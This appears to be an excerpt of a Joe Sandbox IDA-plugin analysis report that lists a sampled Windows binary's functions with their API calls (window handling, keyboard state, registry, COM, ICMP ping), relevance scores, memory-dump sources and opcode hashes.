                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 1149970189-3457252023
                                                    • Opcode ID: 3802673dff723f159f78f4a5d235cf8a2eeedb7c53d0491ec6001fee1eff5a37
                                                    • Instruction ID: 5b36242d97eb11d9060dbbbd9c9abbe01c15af39c5dba9500dde5cc231e0170c
                                                    • Opcode Fuzzy Hash: 3802673dff723f159f78f4a5d235cf8a2eeedb7c53d0491ec6001fee1eff5a37
                                                    • Instruction Fuzzy Hash: 3731E47590021AABDB22EFA0DC45FEB37BCEF8A740F1041B5F61AD6460E7749644CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037EEDC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • timeGetTime.WINMM ref: 0037EEE0
                                                      • Part of subcall function 0032F27E: timeGetTime.WINMM(?,?,0037EF00), ref: 0032F282
                                                    • Sleep.KERNEL32(0000000A), ref: 0037EF0D
                                                    • EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 0037EF31
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0037EF53
                                                    • SetActiveWindow.USER32 ref: 0037EF72
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0037EF80
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0037EF9F
                                                    • Sleep.KERNEL32(000000FA), ref: 0037EFAA
                                                    • IsWindow.USER32 ref: 0037EFB6
                                                    • EndDialog.USER32(00000000), ref: 0037EFC7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: 7cf079cfdf1b86cf9273afd38ff16c4c6d14712416e1d8084be9f51134caf72f
                                                    • Instruction ID: 84dbe3456d75e36e371c6d312d24de88a6019d0a912f0960987eeb83f53ea24d
                                                    • Opcode Fuzzy Hash: 7cf079cfdf1b86cf9273afd38ff16c4c6d14712416e1d8084be9f51134caf72f
                                                    • Instruction Fuzzy Hash: 8221A774100244BFDB235F70ECCCA6A3BAEF74A344F028555F45A8AAF1CB768C009A24
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00343010 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00343024
                                                      • Part of subcall function 00342D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0034DB71,003E1DC4,00000000,003E1DC4,00000000,?,0034DB98,003E1DC4,00000007,003E1DC4,?,0034DF95,003E1DC4), ref: 00342D6E
                                                      • Part of subcall function 00342D58: GetLastError.KERNEL32(003E1DC4,?,0034DB71,003E1DC4,00000000,003E1DC4,00000000,?,0034DB98,003E1DC4,00000007,003E1DC4,?,0034DF95,003E1DC4,003E1DC4), ref: 00342D80
                                                    • _free.LIBCMT ref: 00343030
                                                    • _free.LIBCMT ref: 0034303B
                                                    • _free.LIBCMT ref: 00343046
                                                    • _free.LIBCMT ref: 00343051
                                                    • _free.LIBCMT ref: 0034305C
                                                    • _free.LIBCMT ref: 00343067
                                                    • _free.LIBCMT ref: 00343072
                                                    • _free.LIBCMT ref: 0034307D
                                                    • _free.LIBCMT ref: 0034308B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID: &;
                                                    • API String ID: 776569668-2531589788
                                                    • Opcode ID: 9c610172d1db39e5b702db9789cbdcff0377ec3ec846e543ee59978cf65955a9
                                                    • Instruction ID: 40bc2fdbeefa873402aecbccfd47c60249ecc79ea279081bf00e484b7cb7a19d
                                                    • Opcode Fuzzy Hash: 9c610172d1db39e5b702db9789cbdcff0377ec3ec846e543ee59978cf65955a9
                                                    • Instruction Fuzzy Hash: F111777651014CBFCB42EF54C842CDE3BA5EF06350B9145A5BA28AF132D671EED19F40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037A86D Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0037A8EE
                                                    • SetKeyboardState.USER32(?), ref: 0037A959
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 0037A979
                                                    • GetKeyState.USER32(000000A0), ref: 0037A990
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 0037A9BF
                                                    • GetKeyState.USER32(000000A1), ref: 0037A9D0
                                                    • GetAsyncKeyState.USER32(00000011), ref: 0037A9FC
                                                    • GetKeyState.USER32(00000011), ref: 0037AA0A
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0037AA33
                                                    • GetKeyState.USER32(00000012), ref: 0037AA41
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 0037AA6A
                                                    • GetKeyState.USER32(0000005B), ref: 0037AA78
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 219be210edc66762bde8d3e25402925d9b700abb45a320d5b06407ee4a3d3b70
                                                    • Instruction ID: 45d8edd9137e2b05a6d699428336792d4c32a65f68ee889390352608684ac35f
                                                    • Opcode Fuzzy Hash: 219be210edc66762bde8d3e25402925d9b700abb45a320d5b06407ee4a3d3b70
                                                    • Instruction Fuzzy Hash: 1151F820904B8869EB37D7B048147AEBFF49F52340F09C589D5CA1B1C2DB589A4CCB63
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00376555 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32 ref: 00376571
                                                    • GetWindowRect.USER32 ref: 0037658A
                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 003765E8
                                                    • GetDlgItem.USER32 ref: 003765F8
                                                    • GetWindowRect.USER32 ref: 0037660A
                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 0037665E
                                                    • GetDlgItem.USER32 ref: 0037666C
                                                    • GetWindowRect.USER32 ref: 0037667E
                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 003766C0
                                                    • GetDlgItem.USER32 ref: 003766D3
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003766E9
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 003766F6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: 30afc71be88e6ab4e44c93f4de75ceca1984565ca0e27a4205395920762c8a33
                                                    • Instruction ID: f3f45730c60da5dfbc1b2a820716d4ab9853fa18fc769003df0f1544e56b65c3
                                                    • Opcode Fuzzy Hash: 30afc71be88e6ab4e44c93f4de75ceca1984565ca0e27a4205395920762c8a33
                                                    • Instruction Fuzzy Hash: 17515170B00605AFDF19CF68DD96AAEBBB9FB48310F508128F51AE7690D774AD00CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003120D8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003121E4: GetWindowLongW.USER32(?,000000EB), ref: 003121F2
                                                    • GetSysColor.USER32(0000000F), ref: 00312102
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: 4064e17c799928c1f735538c29dcb80ce60ff7eb7880130ad8713918f03763c5
                                                    • Instruction ID: d4430bd31c10065b4bff8fd7d606532a638a03e9911e186290b6e1387e78719e
                                                    • Opcode Fuzzy Hash: 4064e17c799928c1f735538c29dcb80ce60ff7eb7880130ad8713918f03763c5
                                                    • Instruction Fuzzy Hash: 7A41B571100640AFDB2A9F389C44BFB3769EB4B361F154615FAA2872E1C7718D92DB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00370F6E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00371032
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0037104E
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0037106A
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00371094
                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 003710BC
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003710C7
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003710CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 323675364-22481851
                                                    • Opcode ID: c044c36f44e04372159ea920ac6f3e4c0981e35f5b4ee668a96130f147441da6
                                                    • Instruction ID: a76dd44d797b911c08daaa1ebb7f806f508614479a76fa4690d3d2ae1c0b43f6
                                                    • Opcode Fuzzy Hash: c044c36f44e04372159ea920ac6f3e4c0981e35f5b4ee668a96130f147441da6
                                                    • Instruction Fuzzy Hash: 64410972C10229ABCF26EFA4DC959EEB7B9FF08300F044069F915A7160EB749E44CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A48F7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003A499A
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 003A49A1
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003A49B4
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003A49BC
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 003A49C7
                                                    • DeleteDC.GDI32(00000000), ref: 003A49D1
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 003A49DB
                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 003A49F1
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 003A49FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: f66413f2cb492c6339f38152c843d7687af7defbc3162eebdd5f4fef04fb309e
                                                    • Instruction ID: 7ec2663d4b5b9e43ccce0e5c2bacd41cdc2aae7a4002e1abcfb75a0accaf8407
                                                    • Opcode Fuzzy Hash: f66413f2cb492c6339f38152c843d7687af7defbc3162eebdd5f4fef04fb309e
                                                    • Instruction Fuzzy Hash: D7314B72100219ABDF129FA4DC08FDB3B6CFF4A724F110215FA66A60A0D775D820DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0039458D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 003945B9
                                                    • CoInitialize.OLE32(00000000), ref: 003945E7
                                                    • CoUninitialize.OLE32 ref: 003945F1
                                                    • _wcslen.LIBCMT ref: 0039468A
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0039470E
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00394832
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0039486B
                                                    • CoGetObject.OLE32(?,00000000,003B0B64,?), ref: 0039488A
                                                    • SetErrorMode.KERNEL32(00000000), ref: 0039489D
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00394921
                                                    • VariantClear.OLEAUT32(?), ref: 00394935
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                    • String ID:
                                                    • API String ID: 429561992-0
                                                    • Opcode ID: d98c3f5c7991362423d250509fcf208ef19e2218a3b94521ce2bcc987c5118a0
                                                    • Instruction ID: c136ca5958348634b472f40ca613a26a181b11008ddf3841d4c1329afe5bf596
                                                    • Opcode Fuzzy Hash: d98c3f5c7991362423d250509fcf208ef19e2218a3b94521ce2bcc987c5118a0
                                                    • Instruction Fuzzy Hash: C3C124B16083059FCB06DF68C884D6BB7E9EF89748F10495DF99A9B210DB31EC46CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003883F0 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0038844D
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003884E9
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 003884FD
                                                    • CoCreateInstance.OLE32(003B0CD4,00000000,00000001,003D7E8C,?), ref: 00388549
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003885CE
                                                    • CoTaskMemFree.OLE32(?,?), ref: 00388626
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 003886B1
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003886D4
                                                    • CoTaskMemFree.OLE32(00000000), ref: 003886DB
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00388730
                                                    • CoUninitialize.OLE32 ref: 00388736
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                    • String ID:
                                                    • API String ID: 2762341140-0
                                                    • Opcode ID: 47ee4f7743b60eba8a7d3c224161a92e6724cec1fca12bb53600b5847feb04a7
                                                    • Instruction ID: da7cb9ece123af37e631a612c64804d3e8c0e88f94bc9ae65cc05180521b296e
                                                    • Opcode Fuzzy Hash: 47ee4f7743b60eba8a7d3c224161a92e6724cec1fca12bb53600b5847feb04a7
                                                    • Instruction Fuzzy Hash: C5C11A75A00209AFCB15DFA4C884DAEBBF9FF49304B158098F51AEB661DB30ED45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00370318 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0037033F
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00370398
                                                    • VariantInit.OLEAUT32(?), ref: 003703AA
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 003703CA
                                                    • VariantCopy.OLEAUT32(?,?), ref: 0037041D
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00370431
                                                    • VariantClear.OLEAUT32(?), ref: 00370446
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00370453
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0037045C
                                                    • VariantClear.OLEAUT32(?), ref: 0037046E
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00370479
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 86fdb02a94414f8b1c8a17f8a727ccf141f389f00c7615b5aad6da5e3f9654ec
                                                    • Instruction ID: dd86a971e8501a2ee68a5ca00042c94d15db00623fe424cb00ef26c65a8d7122
                                                    • Opcode Fuzzy Hash: 86fdb02a94414f8b1c8a17f8a727ccf141f389f00c7615b5aad6da5e3f9654ec
                                                    • Instruction Fuzzy Hash: 44416375A00219EFCB16DF65C8449EEBBB9FF58344F00C069E95AAB261CB34A945CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003AA8E5 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00312441: GetWindowLongW.USER32(00000000,000000EB), ref: 00312452
                                                    • GetSystemMetrics.USER32 ref: 003AA926
                                                    • GetSystemMetrics.USER32 ref: 003AA946
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003AAB83
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003AABA1
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003AABC2
                                                    • ShowWindow.USER32(00000003,00000000), ref: 003AABE1
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 003AAC06
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 003AAC29
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID:
                                                    • API String ID: 1211466189-3916222277
                                                    • Opcode ID: 260cf48ac677c00f23f53b68c58c4e85950359f1bbcd4ecd4d7e51b82d213e5b
                                                    • Instruction ID: 69676bfc000a1fd6f8820069175f5298989188aa94adfc2dbb3f1c84646c6b4e
                                                    • Opcode Fuzzy Hash: 260cf48ac677c00f23f53b68c58c4e85950359f1bbcd4ecd4d7e51b82d213e5b
                                                    • Instruction Fuzzy Hash: 7EB19B32600619DFDF1ACF68C9857AE7BF6FF46701F098069EC499B295D730A980CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00390EB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00390F19
                                                    • inet_addr.WSOCK32(?), ref: 00390F79
                                                    • gethostbyname.WSOCK32(?), ref: 00390F85
                                                    • IcmpCreateFile.IPHLPAPI ref: 00390F93
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00391023
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00391042
                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00391116
                                                    • WSACleanup.WSOCK32 ref: 0039111C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: 585fa8e6e2b3af6a311ef1071bf77d48182ddb450294b47e6fe2f3c12d2e0daf
                                                    • Instruction ID: 3a5717c0a2ca8bedf037d50b3c256e0f197798e227191102e8052109aeef5874
                                                    • Opcode Fuzzy Hash: 585fa8e6e2b3af6a311ef1071bf77d48182ddb450294b47e6fe2f3c12d2e0daf
                                                    • Instruction Fuzzy Hash: C591A031604242AFDB26CF15C889B16BBE4EF48318F158599F46A9F7A2C731ED85CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00388AEF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 00388BB1
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00388BC1
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00388BCD
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00388C6A
